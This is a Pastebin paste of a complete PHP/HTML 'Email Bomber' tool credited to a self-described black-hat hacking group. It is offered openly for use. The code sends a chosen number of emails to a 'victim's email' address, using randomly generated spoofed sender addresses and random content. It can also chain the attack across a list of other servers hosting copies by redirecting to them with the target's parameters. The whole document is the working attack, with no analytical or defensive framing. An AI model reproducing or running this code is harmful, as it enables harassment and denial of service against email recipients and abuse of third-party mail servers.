Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>BBHH Email Bomber</title>
- <meta name="author" content="orionshunter">
- <meta name="description" content="BBHH Email Bomber v.1">
- <meta name="keywords" content="send mass mail, email bomb">
- <meta name="web_content_type" content="ZON3-404">
- <link rel="SHORTCUT ICON" href="http://i.imgur.com/MTTZR.gif">
- <style type="text/css">
- body
- {
- background-color:black;
- color:white;
- }
- #error
- {
- font-weight:bold;
- color:red;
- }
- #success
- {
- font-weight:bold;
- color:green;
- }
- a:link
- {
- text-decoration:none;
- color:#FFFF00;
- }
- a:visited
- {
- text-decoration:none;
- color:white;
- }
- a:hover
- {
- text-decoration:none;
- color:red;
- }
- .style1 {
- color: #00FF00;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .style2 {
- color: #FF0000;
- font-size: 18px;
- }
- .style3 {color: #FFFF00}
- .style4 {color: #FF0000}
- body{padding:0;margin:0;background-repeat:repeat;background-position:tile;background-color:black;color:#000000;font:normal 100% Courier;margin-top:0px;margin-left:0px;padding:0;margin-right:0px;background-image:url(http://i1100.photobucket.com/albums/g419/ghostleader121/c.gif);}
- img{border:1px solid grey;
- border-radius:30px;
- margin:auto;
- -webkit-transition:all .9s ease-in-out;
- -moz-transition:all .9s ease-in-out;
- }
- img:hover{-webkit-transform:rotate(360deg);
- -moz-transform:rotate(360deg);
- width:800px;
- }
- .style5 {color: #FFFFFF}
- .style7 {
- font-family: Verdana, Arial, Helvetica, sans-serif;
- font-weight: bold;
- }
- .style10 {
- color: #00FFFF;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .style11 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; }
- .style12 {color: #00FF00; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; }
- </style>
- <body bgcolor=black>
- <?php
- $rand_alpha = array_merge(range('A', 'Z'), range('a', 'z'));
- function checklink($url)
- {
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_NOBODY, true);
- $result = curl_exec($curl);
- $ret = false;
- if ($result !== false)
- {
- $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
- if ($statusCode == 200)
- {
- $ret = true;
- }
- }
- curl_close($curl);
- return $ret;
- }
- function getrand($arg1,$arg2="")
- {
- global $rand_alpha;
- $str = "";
- for($i=0;$i<$arg1;$i++)
- {
- $str.= $rand_alpha[array_rand($rand_alpha,1)];
- }
- if($arg2 != "")
- {
- $str2 = "";
- $email_len = rand(3,12);
- for($i=0;$i<$email_len;$i++)
- {
- $str2 .= $rand_alpha[array_rand($rand_alpha,1)];
- }
- $str .= '@'.$str2.'.com';
- }
- return $str;
- }
- ?>
- <center>
- <h1 class="style12">BBHH Email Bomber V.1 </h1>
- <p><strong><sub id="info"><span class="style7"><a href="http://greenweb.com.bd" target="_blank"><span class="style2">Recoded by <span class="style3">orionshunter</span> of BD BLACK HAT HACKERS</span> <br />
- Website: http://greenweb.com.bd</a></span></sub></strong></p>
- <p><span class="style12">My facebook:</span> <span class="style11"><a href="https://fb.com/orionshunter">fb.com/orionshunter</a></span> <br />
- <?php
- if (!function_exists( 'mail' ) )
- {
- $flag = 0;
- $err[$init++] = 'mail() function is disbled on this server.';
- }
- if(isset($_GET['orions']))
- {
- $flag = 0;
- $email = $_GET['email'];
- $file = $_GET['file'];
- $no = (int)$_GET['no'];
- $sub = $_GET['sub'];
- $con = $_GET['content'];
- $init = 0;
- $point = 0;
- if(isset($_GET['point']))
- {
- $point = $_GET['point'];
- }
- if (!filter_var($email, FILTER_VALIDATE_EMAIL))
- {
- $err[$init++] = 'Please enter a valid Email Address';
- $flag = 1;
- }
- if(!is_int($no))
- {
- $err[$init++] = 'Number of emails to be sent should an integer';
- $flag = 1;
- }
- else
- {
- if($no < 0)
- {
- $err[$init++] = 'Number of emails to be sent should be atleast 1';
- $flag = 1;
- }
- if($no == 0)
- {
- $no = rand(0,20);
- }
- }
- $err_count = count($err);
- if($err_count > 0)
- {
- echo '<p id="error">';
- for($shout=0;$shout<$err_count;$shout++)
- {
- echo $err[$shout].'<br />';
- }
- echo '</p>';
- }
- if($flag == 0)
- {
- echo '<p id="success">';
- for($send=0;$send<$no;$send++)
- {
- $up = rand(5,15);
- $down = rand(5,15);
- $sender = 'From: '. getrand($up,$down);
- if($sub == "" || $sub == NULL)
- {
- $rand = rand(5,30);
- $sub = getrand($rand);
- }
- if($con == "" || $con == NULL)
- {
- $rand = rand(30,300);
- $con = getrand($rand);
- }
- mail($email,$sub,$con,$sender);
- }
- echo 'Mail Sent '.$no.' times';
- echo '</p>';
- if($file != "")
- {
- if(file_exists($file))
- {
- $activate = 0;
- $done = 0;
- $fp = fopen($file,"r");
- while (($line = fgets($fp, 4096)) !== false)
- {
- if(checklink($line))
- {
- if($point == $activate)
- {
- $goto = $line;
- break;
- }
- else
- {
- $activate++;
- }
- }
- }
- $point++;
- $goto .= '?email='.$email.'&file='.$file.'&no='.$no.'&sub='.$sub.'&content='.$con.'&orions=BOMB&point='.$point;
- echo ' <META HTTP-EQUIV="refresh" CONTENT="5;URL='.$goto.'">';
- fclose($fp);
- }
- }
- }
- }
- ?>
- </p>
- <form method="get" action="">
- <br /><table>
- <tr>
- <td><span class="style10">Target Email Address :</span></td>
- <td><input type="text" name="email" value="victim's email" ></td></tr><tr><Td colspan=2> </td>
- </tr>
- <tr>
- <td><span class="style1">Multi Server ( optional ) :</span></td>
- <td><input type="text" Value="more server more fun" name="file"></td></tr>
- <tr><Td colspan=2> </td>
- </tr>
- <tr>
- <td><span class="style10">Number of emails per server:</span></td>
- <td><input type="text" value="number of email" name="no"></td></tr>
- <tr>
- <td colspan=2> </td>
- </tr>
- <tr>
- <td><span class="style10">message</span><span class="style10">:</span></td>
- <td><textarea name="content"></textarea></td></tr>
- </table>
- <p>
- <input type="Submit" name="orions" value="Fire">
- </p>
- <p> </p>
- <p class="style11"><span class="style5">Thankyou for using my script.Soon, I will add more features. So follow my</span> <a href="http://greenweb.com.bd" target="_blank" class="style4">website</a><span class="style5"> regularly and give me your feedback </span></p>
- </form>
- </center>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment